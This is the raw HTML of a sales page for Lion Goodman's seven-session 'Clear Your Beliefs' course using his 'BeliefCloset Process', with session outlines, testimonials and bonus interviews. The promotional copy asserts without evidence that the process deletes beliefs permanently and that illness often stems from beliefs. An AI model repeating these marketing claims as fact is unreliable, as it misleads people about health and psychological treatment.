/></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships. If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?\r\n\r\nHumans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\r\n\r\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal 